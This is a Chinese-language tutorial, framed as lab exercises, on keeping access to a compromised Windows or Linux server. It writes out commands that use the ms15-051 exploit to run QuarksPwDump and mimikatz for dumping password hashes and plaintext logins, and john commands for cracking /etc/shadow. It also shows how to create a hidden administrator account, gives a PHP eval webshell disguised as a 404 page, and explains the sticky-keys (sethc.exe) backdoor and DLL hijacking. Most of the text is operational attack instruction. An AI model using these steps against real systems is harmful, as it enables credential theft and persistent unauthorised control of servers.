當攻擊者獲取服務器權限後,通常會採用一些後門技術來維持自己當前得到的權限,服務器一旦被植入後門,那麼攻擊者下次進入就方便多了。 由於攻擊可能被發現,會清除一些shell,導致目標丟失,所以需要留下後門來維持權限,達到持續控制的目的。
實驗一:獲取windows系統登錄賬號
實驗環境:windows2008
windows系統登陸賬號存儲位置:C:\Windows\System32\config\SAM
windows密碼驗證原理:
在Windows系統中,對用戶賬戶的安全管理採用了SAM(Security Account Manager,安全賬號管理)機制,用戶賬戶以及密碼經過Hash加密之後,都保存在SAM數據庫中。
SAM數據庫保存在C:\WINDOWS\system32\config\SAM文件中,當用戶登錄系統時,首先就要與SAM文件中存放的賬戶信息進行對比,驗證通過方可登錄。系統對SAM文件提供了保護機制,無法將其複製或是刪除,也無法直接讀取其中的內容。
-SAM文件兩種加密方式介紹: LM加密和NTLM加密
對於Windows2003之前,包括win2003系統,採用的是LM口令散列,對於Windows 2003之後的系統,採用的是NTLM口令列。
LM和NTLM都是基於Hash加密,但是它們的安全機制和安全強度存在差別,LM口令散列的安全性相對比較差。儘管現在已很少有人使用Windows2k之前的老版本系統,但爲了保持向後兼容性,默認情況下,系統仍會將用戶密碼分別用這兩種機制加密後存放在SAM數據庫裏。
-兩種加密方式的區別:
LM加密,密碼最多14位,如果口令不足14位,不足的部分用0補齊,把所有的字符轉變爲大寫,然後分成兩組,每組7位,分別加密,然後拼接在一起,就是最終的LM散列,本質是DES加密。
NTLM加密,先將用戶口令轉變爲unicode編碼,再進行標準MD4單向哈希加密。
LM加密安全性遠低於NTLM加密,因爲NTLM加密它允許使用更長的密碼,允許有大小寫的不同,而且也無須把密碼分割成更小、更易於被破解的塊。所以在一個純NTLM環境中,應該關閉Lan Manager加密方式。
實驗步驟:
一、搭建環境
1.在wwwroot目錄下上傳一句話
2.菜刀連接
3.利用windows2008的系統漏洞進行提權
方法一:利用QuarksPwDump.exe獲取密文
1.用菜刀上傳工具:QuarksPwDump.exe
2.在菜刀命令行輸入以下命令:
C:\Windows\Temp\ms15-051x64.exe "C:\Windows\Temp\QuarksPwDump.exe --dump-hash-local"
3.在cmd5上進行解碼
方法二:利用工具mimikatz抓取賬號明文
原理:從lsass.exe進程中直接獲取密碼信息進行破解,而且該破解應該並非窮舉方式,而是直接根據算法進行反向計算
lsass.exe是系統進程,用於本地安全認證服務
1.上傳mimikatz工具
2.在菜刀中輸入以下命令獲取明文密碼:
C:\Windows\Temp\ms15-051x64.exe "C:\Windows\temp\mimikatz.exe privilege::debug sekurlsa::logonpasswords exit"
實驗二:獲取linux/unix系統登陸賬號
系統賬號密碼儲存位置:
賬號:/etc/passwd 密碼:/etc/shadow
實驗環境:kali
使用工具:john the ripper
實驗步驟:
破解密碼,輸入:
john --single /etc/shadow
或指定字典破解:
john --wordlist list /etc/shadow
2.查看密碼:
安裝後門程序
常見的後門技術有隱藏、克隆賬戶,隱藏webshell,shift後門,啓動項、計劃任務,DLL劫持技術,Powershell後門,遠控軟件等
實驗目的:攻擊者在獲取服務器權限後,通常會用一些後門技術來維持服務器權限,服務器一旦被植入後門,攻擊者如入無人之境
實驗環境:windows2008
實驗一:隱藏賬戶
1.常見一個隱藏用戶:net user zs$ 123.com /add,並將其添加到管理員組:net localgroup aadministrators zs$ /add
2.利用新創建的隱藏用戶登錄,該用戶便有了管理員權限
實驗二:利用403或404頁面隱藏webshell
1.複製404報錯的源代碼
2.新建一個文件,將代碼寫入,並加一句話木馬,將55.php換成新建的文件名
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /666.php was not found on this server.</p>
</body></html>
<?php @eval($_REQUEST[666])?>
3.當訪問時就會出現404假象,即可用菜刀連接
實驗三:windows shift 後門
實驗原理:利用cmd.exe重命名,覆蓋原來的粘連鍵。當我們再次觸發粘連鍵時,相當於運行了cmd.exe
sethc.exe位置:Windows/System32/sethc.exe
實驗內容:將cmd.exe 重命名並替換掉shift(粘滯鍵)(sethc.exe)功能,這樣在通過遠程桌面登錄服務器之後,在輸入帳號密碼處,按5次shift即可彈出cmd的命令行,權限爲system。
實驗四:DLL劫持提權
DLL劫持原理舉例:
例如你安裝了酷狗播放器,而酷狗播放器在播放音樂的時候必須調用Windows系統下一個標準動態鏈接庫mp3play.dll,那麼黑客就自己開發一個惡意的mp3play.dll,然後再找一個MP3歌曲,將這個惡意的DLL和歌曲放在同一個文件夾下,然後打包壓縮發給受害者。
如果受害者用右鍵將這個壓縮包中的MP3文件和DLL文件都解壓縮到了一個目錄中(90%的人會這樣幹),那麼當受害者點擊這個MP3文件的時候,酷狗就會先去尋找mp3play.dll進行加載,而微軟設計的加載dll順序是先從默認文件本身的目錄進行尋找,於是那個虛假的、惡意的mp3play.dll就先被加載運行了。